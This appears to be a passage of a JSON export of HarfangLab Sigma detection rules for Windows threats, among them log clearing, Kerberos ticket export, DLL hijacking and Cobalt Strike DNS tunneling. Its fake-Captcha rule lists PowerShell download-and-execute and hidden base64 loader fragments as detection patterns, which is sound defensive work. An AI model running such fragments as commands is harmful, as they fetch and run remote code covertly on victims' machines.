"content": "title: Windows Security Log Cleared Remotely\nid: 68dc5935-e8e4-4223-b4ca-abdf6c9864d3\ndescription: |\n Detects the Windows Security audit log being cleared remotely.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to check for other malicious behavior on the host and the remote host with the help of the machine's timeline.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 1102\n Source: 'Microsoft-Windows-Eventlog'\n SessionLogonType: 3\n user_data.ClientProcessStartKey: '0'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68dc5935-e8e4-4223-b4ca-abdf6c9864d3",
"rule_name": "Windows Security Log Cleared Remotely",
"rule_description": "Detects the Windows Security audit log being cleared remotely.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to check for other malicious behavior on the host and the remote host with the help of the machine's timeline.\n",
"rule_creation_date": "2026-01-15",
"rule_modified_date": "2026-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68de28b9-b754-4a90-a70e-316dee48d824",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623439Z",
"creation_date": "2026-03-23T11:45:34.623441Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623445Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/004/"
],
"name": "t1566_fake_captcha_exploitation_powershell.yml",
"content": "title: Fake Captcha Exploitation Detected via PowerShell\nid: 68de28b9-b754-4a90-a70e-316dee48d824\ndescription: |\n Detects a suspicious Powershell command related to fake Captchas.\n Attackers use fake Captcha verification pages to trick users into executing a malicious Powershell payload by asking them to open and copy paste malicious code into a Powershell terminal.\n This technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\n It is recommended to investigate the Powershell command to determine its legitimacy.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/10/29\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1059.001\n - attack.t1204.004\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_explorer:\n - ProcessParentImage|endswith: '\\explorer.exe'\n - ProcessGrandparentImage|endswith: '\\explorer.exe'\n\n selection_command1:\n PowershellCommand:\n - '*.b-cdn.net/*'\n - 'mshta \"http*'\n - 'iex (iwr http* -UseBasicParsing).Content'\n - '*; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text'\n - '*largos.short.gy/*'\n - '*PowerShell.exe -W HiDdEN [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(*)) | iex'\n - '*Start-Process \"?:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe\" -ArgumentList \"-w hidden -ep bypass -nop -Command `\"iex ((New-Object System.Net.WebClient).DownloadString(*))`\"\" -WindowStyle Hidden*'\n\n selection_command2:\n PowershellCommand|contains|all:\n - '$webClient = New-Object System.Net.WebClient'\n - '$webClient.DownloadFile($url1,'\n - 'Start-Process -FilePath $env:TEMP\\'\n\n selection_command3:\n PowershellCommand|contains|all:\n - '$env:APPDATA\\'\n - '(Test-Path '\n - '{ New-Item -Path '\n - '-ItemType Directory }'\n - 'Start-BitsTransfer -Source '\n - 'Expand-Archive -Path '\n - 'New-ItemProperty -Path ?HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run? -Name ?'\n\n selection_command4:\n PowershellCommand|contains|all:\n - '=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor(('\n - ')),[byte[]]::new(16)).TransformFinalBlock('\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection_explorer and 1 of selection_command* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68de28b9-b754-4a90-a70e-316dee48d824",
"rule_name": "Fake Captcha Exploitation Detected via PowerShell",
"rule_description": "Detects a suspicious Powershell command related to fake Captchas.\nAttackers use fake Captcha verification pages to trick users into executing a malicious Powershell payload by asking them to open and copy paste malicious code into a Powershell terminal.\nThis technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\nIt is recommended to investigate the Powershell command to determine its legitimacy.\n",
"rule_creation_date": "2024-10-29",
"rule_modified_date": "2026-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1204.004",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68fe4fff-4e59-4cff-a376-dc54db74ee2f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626179Z",
"creation_date": "2026-03-23T11:45:34.626181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/kerberos-tickets-on-linux-red-teams",
"https://blog.netwrix.com/2022/09/28/how-to-detect-pass-the-ticket-attacks/"
],
"name": "t1558_kirbi_file_written_to_disk.yml",
"content": "title: Kerberos Ticket File Exported to Disk\nid: 68fe4fff-4e59-4cff-a376-dc54db74ee2f\ndescription: |\n Detects the creation of a file on disk with the .kirbi (Windows Kerberos Format), or .ccache (Linux Kerberos Format) extension.\n This is usually the result of memory secret extraction tools, such as mimikatz, which contain modules to export Kerberos tickets from memory.\n It is recommended to investigate the incident to determine if any unauthorized authentication has taken place. An investigative guide is present in the references.\nreferences:\n - https://www.mandiant.com/resources/blog/kerberos-tickets-on-linux-red-teams\n - https://blog.netwrix.com/2022/09/28/how-to-detect-pass-the-ticket-attacks/\ndate: 2023/05/23\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558\n - attack.defense_evasion\n - attack.t1550.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '.ccache'\n - '.kirbi'\n\n exclusion_blkns:\n ProcessCommandLine|contains:\n # C:\\Windows\\Temp\\blckns\\ (base64 UTF16-LE)\n - 'QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABiAGwAYwBrAG4AcwBcA'\n - 'MAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAYgBsAGMAawBuAHMAXA'\n - 'DADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAGIAbABjAGsAbgBzAFwA'\n # Direct execution\n - 'start-transcript -path \\\\\\\\127.0.0.1\\\\?$\\windows\\temp\\blckns\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68fe4fff-4e59-4cff-a376-dc54db74ee2f",
"rule_name": "Kerberos Ticket File Exported to Disk",
"rule_description": "Detects the creation of a file on disk with the .kirbi (Windows Kerberos Format), or .ccache (Linux Kerberos Format) extension.\nThis is usually the result of memory secret extraction tools, such as mimikatz, which contain modules to export Kerberos tickets from memory.\nIt is recommended to investigate the incident to determine if any unauthorized authentication has taken place. An investigative guide is present in the references.\n",
"rule_creation_date": "2023-05-23",
"rule_modified_date": "2026-01-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1550.003",
"attack.t1558"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6916476e-3990-45fa-9370-3bd47e7ff3a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601765Z",
"creation_date": "2026-03-23T11:45:34.601769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601777Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wmpdmc.yml",
"content": "title: DLL Hijacking via wmpdmc.exe\nid: 6916476e-3990-45fa-9370-3bd47e7ff3a6\ndescription: |\n Detects potential Windows DLL Hijacking via wmpdmc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wmpdmc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\OLEACC.dll'\n - '\\UxTheme.dll'\n - '\\WindowsCodecs.dll'\n - '\\wmpdui.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6916476e-3990-45fa-9370-3bd47e7ff3a6",
"rule_name": "DLL Hijacking via wmpdmc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wmpdmc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6917420f-8cf8-42ed-b237-e6035a048408",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087993Z",
"creation_date": "2026-03-23T11:45:34.087995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087999Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/egre55/status/1052907871749459968",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_syntpenh_spawning_processes.yml",
"content": "title: Process Spawned by SynTPEnh.exe\nid: 6917420f-8cf8-42ed-b237-e6035a048408\ndescription: |\n Detects suspicious processes started from the legitimate Lenovo binary SynTPEnh.exe in order to proxy execution and evade defenses.\n This binary can be used as a LOLBin in order to proxy the execution of other binaries.\n It is recommended to investigate the legitimacy of the process responsible for the execution of SynTPEnh.exe and to analyze child processes.\nreferences:\n - https://twitter.com/egre55/status/1052907871749459968\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/05/17\nmodified: 2025/10/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - ParentImage|endswith: '\\SynTPEnh.exe'\n - ProcessParentOriginalFileName: 'SynTPEnh.exe'\n\n selection_commandline:\n ParentCommandLine|contains: ' ?SHELLEXEC '\n\n filter_legitimate:\n Image:\n - '?:\\Windows\\System32\\SynTPEnh.exe'\n - '?:\\Windows\\System32\\SynTPHelper.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynTPLpr.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynTPHelper.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynLenovoHelper.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\DellTpad.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\DellTouchpad.exe'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6917420f-8cf8-42ed-b237-e6035a048408",
"rule_name": "Process Spawned by SynTPEnh.exe",
"rule_description": "Detects suspicious processes started from the legitimate Lenovo binary SynTPEnh.exe in order to proxy execution and evade defenses.\nThis binary can be used as a LOLBin in order to proxy the execution of other binaries.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of SynTPEnh.exe and to analyze child processes.\n",
"rule_creation_date": "2022-05-17",
"rule_modified_date": "2025-10-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69250942-f254-440e-a301-7ce05a297557",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081651Z",
"creation_date": "2026-03-23T11:45:34.081653Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081657Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qrtfi.yml",
"content": "title: DLL Hijacking via qrtf.exe\nid: 69250942-f254-440e-a301-7ce05a297557\ndescription: |\n Detects potential Windows DLL Hijacking via qrtf.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qrtfix.exe'\n ImageLoaded|endswith: '\\qrt.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\F-Secure\\Anti-Virus\\'\n - '?:\\Program Files\\F-Secure\\Anti-Virus\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69250942-f254-440e-a301-7ce05a297557",
"rule_name": "DLL Hijacking via qrtf.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qrtf.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6937271c-260b-4e5b-b615-ac15220e5645",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082211Z",
"creation_date": "2026-03-23T11:45:34.082213Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082217Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_browserexport.yml",
"content": "title: DLL Hijacking via browserexport.exe\nid: 6937271c-260b-4e5b-b615-ac15220e5645\ndescription: |\n Detects potential Windows DLL Hijacking via browserexport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'browserexport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\msiso.dll'\n - '\\wininet.dll'\n - '\\winsqlite3.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6937271c-260b-4e5b-b615-ac15220e5645",
"rule_name": "DLL Hijacking via browserexport.exe",
"rule_description": "Detects potential Windows DLL Hijacking via browserexport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6939eb2f-40f8-42c0-95f5-b4e8026e51e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083008Z",
"creation_date": "2026-03-23T11:45:34.083010Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/cyb3rops/status/994534209631944704",
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_cobalt_strike_dns_tunneling.yml",
"content": "title: Cobalt Strike DNS Tunneling\nid: 6939eb2f-40f8-42c0-95f5-b4e8026e51e3\ndescription: |\n Detects suspicious DNS query patterns associated with Cobalt Strike DNS tunneling.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n It is recommended analyze the process responsible for the DNS request to determine whether it is indeed a Cobalt Strike beacon and to isolate infected hosts if necessary.\nreferences:\n - https://twitter.com/cyb3rops/status/994534209631944704\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2023/03/23\nmodified: 2025/04/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName: '???.stage.*.*'\n QueryStatusCategory: 'success'\n\n exclusion_prefixes:\n QueryName|startswith:\n - 'www.'\n - 'api.'\n - 'app.'\n\n exclusion_legitimate:\n QueryName:\n # Blacknoise is an attack framework simulation that legitimately uses this domain\n - 'app.stage.blacknoise.co'\n - 'get.stage.adobe.com'\n - 'img.stage.creative.com'\n - 'don.stage.greenpeace.fr'\n - '???.stage.elips-solution.fr*'\n - 'rum.stage.haystack.es'\n - 's3n.stage.cashify.in'\n - 'cms.stage.europapark.de'\n - '*.stage.honeywell.com'\n - 'hms.stage.meininger-hotels.com'\n - 'ocp.stage.walmart.com'\n - 'cpa.stage.vizientinc.com'\n - 'vfm.stage.velco.bike'\n - 'cbr.stage.fsapps.ca'\n - 'cdn.stage.tourradar.com'\n - 'upg.stage.plusgrade.com'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6939eb2f-40f8-42c0-95f5-b4e8026e51e3",
"rule_name": "Cobalt Strike DNS Tunneling",
